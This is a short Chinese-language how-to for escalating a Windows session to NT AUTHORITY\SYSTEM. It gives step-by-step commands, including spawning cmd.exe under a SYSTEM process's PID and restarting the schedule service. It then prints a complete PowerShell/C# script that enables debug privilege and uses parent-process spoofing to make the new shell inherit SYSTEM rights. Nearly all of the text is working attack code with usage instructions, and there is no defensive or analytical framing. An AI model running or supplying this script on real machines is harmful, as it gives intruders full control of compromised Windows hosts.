Windows提权到system权限
提权到nt authority\system权限:
1.在PowerShell下运行p.ps1脚本
2.运行如下命令:
[MyProcess]::CreateProcessFromParent(1580,"c:\windows\system32\cmd.exe","")
3.在新打开的窗口中运行whoami,可以看到当前账户为nt authority\system
4.然后可以重启schedule服务 sc stop schedule && sc start schedule
p.ps1脚本内容如下:
#Simple powershell/C# to spawn a process under a different parent process #usage: import-module psgetsys.ps1; [MyProcess]::CreateProcessFromParent(<system_pid>,<command_to_execute>) $mycode = @" using System; using System.Diagnostics; using System.IO; using System.Runtime.InteropServices; public class MyProcess { [DllImport("kernel32.dll")] static extern uint GetLastError(); [DllImport("kernel32.dll")] [return: MarshalAs(UnmanagedType.Bool)] static extern bool CreateProcess( string lpApplicationName, string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes, ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFOEX lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation); [DllImport("kernel32.dll", SetLastError = true)] [return: MarshalAs(UnmanagedType.Bool)] private static extern bool UpdateProcThreadAttribute( IntPtr lpAttributeList, uint dwFlags, IntPtr Attribute, IntPtr lpValue, IntPtr cbSize, IntPtr lpPreviousValue, IntPtr lpReturnSize); [DllImport("kernel32.dll", SetLastError = true)] [return: MarshalAs(UnmanagedType.Bool)] private static extern bool InitializeProcThreadAttributeList( IntPtr lpAttributeList, int dwAttributeCount, int dwFlags, ref IntPtr lpSize); [DllImport("kernel32.dll", SetLastError = true)] [return: MarshalAs(UnmanagedType.Bool)] private static extern bool DeleteProcThreadAttributeList(IntPtr lpAttributeList); [DllImport("kernel32.dll", SetLastError = true)] static extern bool CloseHandle(IntPtr hObject); [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] struct STARTUPINFOEX { public STARTUPINFO StartupInfo; public IntPtr lpAttributeList; } [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] struct STARTUPINFO { public Int32 cb; public string lpReserved; public string lpDesktop; public string lpTitle; public Int32 dwX; public Int32 dwY; public Int32 dwXSize; public Int32 dwYSize; public Int32 dwXCountChars; public Int32 dwYCountChars; public Int32 dwFillAttribute; public Int32 dwFlags; public Int16 wShowWindow; public Int16 cbReserved2; public IntPtr lpReserved2; public IntPtr hStdInput; public IntPtr hStdOutput; public IntPtr hStdError; } [StructLayout(LayoutKind.Sequential)] internal struct PROCESS_INFORMATION { public IntPtr hProcess; public IntPtr hThread; public int dwProcessId; public int dwThreadId; } [StructLayout(LayoutKind.Sequential)] public struct SECURITY_ATTRIBUTES { public int nLength; public IntPtr lpSecurityDescriptor; public int bInheritHandle; } public static void CreateProcessFromParent(int ppid, string command, string cmdargs) { const uint EXTENDED_STARTUPINFO_PRESENT = 0x00080000; const uint CREATE_NEW_CONSOLE = 0x00000010; const int PROC_THREAD_ATTRIBUTE_PARENT_PROCESS = 0x00020000; var pi = new PROCESS_INFORMATION(); var si = new STARTUPINFOEX(); si.StartupInfo.cb = Marshal.SizeOf(si); IntPtr lpValue = IntPtr.Zero; Process.EnterDebugMode(); try { var lpSize = IntPtr.Zero; InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize); si.lpAttributeList = Marshal.AllocHGlobal(lpSize); InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, ref lpSize); var phandle = Process.GetProcessById(ppid).Handle; Console.WriteLine("[+] Got Handle for ppid: {0}", ppid); lpValue = Marshal.AllocHGlobal(IntPtr.Size); Marshal.WriteIntPtr(lpValue, phandle); UpdateProcThreadAttribute( si.lpAttributeList, 0, (IntPtr)PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, lpValue, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero); Console.WriteLine("[+] Updated proc attribute list"); var pattr = new SECURITY_ATTRIBUTES(); var tattr = new SECURITY_ATTRIBUTES(); pattr.nLength = Marshal.SizeOf(pattr); tattr.nLength = Marshal.SizeOf(tattr); Console.Write("[+] Starting " + command + "..."); var b= CreateProcess(command, cmdargs, ref pattr, ref tattr, false,EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE, IntPtr.Zero, null, ref si, out pi); Console.WriteLine(b+ " - pid: " + pi.dwProcessId+ " - Last error: " +GetLastError() ); } finally { if (si.lpAttributeList != IntPtr.Zero) { DeleteProcThreadAttributeList(si.lpAttributeList); Marshal.FreeHGlobal(si.lpAttributeList); } Marshal.FreeHGlobal(lpValue); if (pi.hProcess != IntPtr.Zero) { CloseHandle(pi.hProcess); } if (pi.hThread != IntPtr.Zero) { CloseHandle(pi.hThread); } } } } "@ Add-Type -TypeDefinition $mycode #Autoinvoke? $cmdargs="" if($args.Length -eq 3) { $cmdargs= $args[1] + " " + $args[2] } #[MyProcess]::CreateProcessFromParent($args[0],$args[1],$cmdargs)